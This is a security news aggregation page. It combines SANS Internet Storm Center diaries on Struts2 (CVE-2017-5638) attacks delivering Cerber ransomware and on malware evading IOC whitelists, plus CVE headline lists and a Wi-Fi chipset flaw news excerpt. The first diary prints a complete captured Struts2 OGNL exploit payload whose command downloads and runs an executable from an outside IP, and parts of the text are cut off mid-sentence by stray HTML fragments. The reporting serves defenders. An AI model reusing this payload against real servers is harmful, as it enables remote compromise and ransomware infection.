(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

[We do have a special webcast about the Struts2 Vulnerability scheduled for 11am ET today. Sign up here]

Since about a month, we are tracking numerous attempts to exploit the Java Struts2 vulnerability (%%cve:2017-5638%%). Typically, the exploits targeted Unix systems with simple Perlbackdoors and bots. But recently, I saw a number of exploit attempts targeting Windows systems using a variant of the Cerber ransomware.

%{(#_=multipart/form-data).([email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[com.opensymphony.xwork2.ActionContext.container]).(#ognlUtil=#container.getInstance(@[email protected])).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd=BITSAdmin.exe /Transfer JOB hxxp://82[.]165[.]129[.]119/UnInstall.exe %TEMP%/UnInstall.exe %TEMP%/UnInstall.exe).(#iswin=(@[email protected](os.name).toLowerCase().contains(win))).(#cmds=(#iswin?{cmd.exe,/c,#cmd}:{/bin/bash,-c,#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@[email protected]().getOutputStream())).(@[email protected](#process.getInputStream(),#ros)).(#ros.flush())}

The command executed by the exploit as shown above:

  1. The script uses BITSAdmin to download the malware (I obfuscated the URL above.
  2. The malware (UnInstall.exe width:300px" />

    The malware reaches out to btc.blockr.io to retrieve a bitcoin wallet address for the money transfer. Encrypted files are renamed using random (encrypted) file names.

    Johannes B. Ullrich, Ph.D. , Dean of Research, SANS Technology Institute

    (c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Google Android CVE-2017-0561 Remote Code Execution Vulnerability
Google Android Qualcomm Wi-Fi Driver CVE-2016-10235 Denial of Service Vulnerability
Google Nexus Qualcomm Qualcomm CP Access Driver CVE-2017-0583 Privilege Escalation Vulnerability
Google Nexus Qualcomm TrustZone CVE-2016-5349 Information Disclosure Vulnerability
Cisco Unified Communications Manager CVE-2017-3886 SQL Injection Vulnerability
Cisco Registered Envelope Service CVE-2017-3889 Open Redirection Vulnerability
Multiple Cisco Products CVE-2017-6600 Local Command Injection Vulnerability
Cisco IOS XE Software CVE-2017-6606 Local Command Execution Vulnerability
Cisco Wireless LAN Controller CVE-2016-9219 Denial of Service Vulnerability
Cisco Wireless LAN Controller CVE-2016-9194 Denial of Service Vulnerability
Cisco Wireless LAN Controller CVE-2016-9195 Denial of Service Vulnerability
Cisco Unified Computing System Director CVE-2017-3817 Information Disclosure Vulnerability

Enlarge (credit: IntelFreePress)

A broad array of Android phones is vulnerable to attacks that use booby-trapped Wi-Fi signals to achieve full device takeover, a researcher has demonstrated.

The vulnerability resides in a widely used Wi-Fi chipset manufactured by Broadcom and used in both iOS and Android devices. Apple patched the vulnerability with Monday's release of iOS 10.3.1. "An attacker within range may be able to execute arbitrary code on the Wi-Fi chip," Apple's accompanying advisory warned. In a highly detailed blog post published Tuesday, the Google Project Zero researcher who discovered the flaw said it allowed the execution of malicious code on a fully updated 6P "by Wi-Fi proximity alone, requiring no user interaction."

Google is in the process of releasing an update in its April security bulletin. The fix is available only to a select number of device models, and even then it can take two weeks or more to be available as an over-the-air update to those who are eligible. Company representatives didn't respond to an e-mail seeking comment for this post.

Read 6 remaining paragraphs | Comments

Ghostscript 'base/gxht_thresh.c' Heap Buffer Overflow Vulnerability
Linux Kernel CVE-2016-10318 Denial of Service Vulnerability
HP Operations Bridge Analytics CVE-2017-5800 Unspecified Cross Site Scripting Vulnerability
Google Nexus Qualcomm Crypto Engine Driver CVE-2017-10230 Remote Code Execution Vulnerability
Linux kernel CVE-2017-2671 Local Denial of Service Vulnerability
ProFTPD CVE-2017-7418 Local Security Bypass Vulnerability
Intel NUC and Compute Stick DCI Multiple Local Information Disclosure Vulnerabilities
Django 'django.views.static.serve()' Function Open Redirection Vulnerability
Google Android libskia CVE-2017-0548 Denial of Service Vulnerability
Linux Kernel 'ipv4/udp.c' Remote Code Execution Vulnerability
ManageEngine Applications Manager Multiple Security Vulnerabilities
Keycloak CVE-2016-8629 Security Bypass Vulnerability
Granite Data Services CVE-2016-2340 XML External Entity Information Disclosure Vulnerability
Adobe LiveCycle Data Services CVE-2015-3269 XML External Entity Information Disclosure Vulnerability
Google Android Qualcomm Wi-Fi Driver CVE-2017-6424 Privilege Escalation Vulnerability
Linux Kernel '/arch/x86/net/bpf_jit_comp.c' CVE-2015-4700 Local Denial of Service Vulnerability

As a defender, take the time to put yourself in the place of a bad guy for a few minutes. Youre writing some malicious code and you need to download payloads from the Internet or hide your code on a website. Once your malicious code spread in the wild, it will be quickly captured by honeypots, IDS, ... (name your best tool) and analysed automatically of manually by the good guys. Their goal of this is to extract abehavioural analysis of the code and generate indicators (IOCs) which will help to detect it. Once IOCs extracted, its just a question of time, they are shared very quickly.

In more and more environments, IOCs are used as a blacklist system and security tools can block access to resources based on the IP addresses, domains, file hashes, etc). But all security control implements also whitelist systems to prevent (as much as possible) false positives. Indeed, if asystem drops connections to a popular website for the users of an organizationor other computers, the damages could be important (sometimes up to aloss of revenue).As a real life example, one of my customers implemented automatic blacklisting based on IOCs but whitelists are in place. To reduce the false positives, two whitelists are implemented for URL filtering:

  • The top-1000 of the Alexa[1] ranking list is automatically whitelisted
  • Top URLs are extracted from the previous week proxy logs and added to the list

To remain below the radar or to bypass controls, the Holy Grail of bad guys is to abuse those whitelists. The Cerber ransomware is a good example. It uses URLs ending with /search.php width:600px" />

Once the malware analysed, the URI /search.php became quickly width:800px" />

By choosing a generic URL like this one, malware writershope that it will be hidden in the traffic. But when it becomes blacklisted, there are side impacts. I had thecase with a customer this week. They had to remove /search.php from the list of IOC padding:5px 10px"> /log.php /asset.php /content.php /list.php /profile.php /report.php /register.php /login.php /rss.php

Another approach is to compromise a website categorised as clean width:800px" />

If typosquatting is still used (ex: use ro0tshell.be instead of rootshell.be), its more efficient if you can host your malicious content behind a real domain with a nice score in lists such as Alexa. And often, the site itself dont need to be compromised. The victim DNS can be hacked / poisoned and new records added to those nice domains. The victim session can be hijacked using MitMtechniques. The whitelist will do the rest...


Xavier Mertens (@xme)
ISC Handler - Freelance Security Consultant

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Multiple Rockwell Automation Products CVE-2017-3881 Remote Code Execution Vulnerability
Schneider Electric Interactive Graphical SCADA DLL Loading Remote Code Execution Vulnerability
Linux Kernel 'digi_acceleport.c' Local Denial of Service Vulnerability
Marel Food Processing Systems Security Bypass and Arbitrary File Upload Vulnerabilities
Google Android Qualcomm Kyro L2 Driver CVE-2017-6423 Privilege Escalation Vulnerability
HP Business Process Monitor CVE-2017-5801 Unspecified Unauthorized Access Vulnerability
Internet Storm Center Infocon Status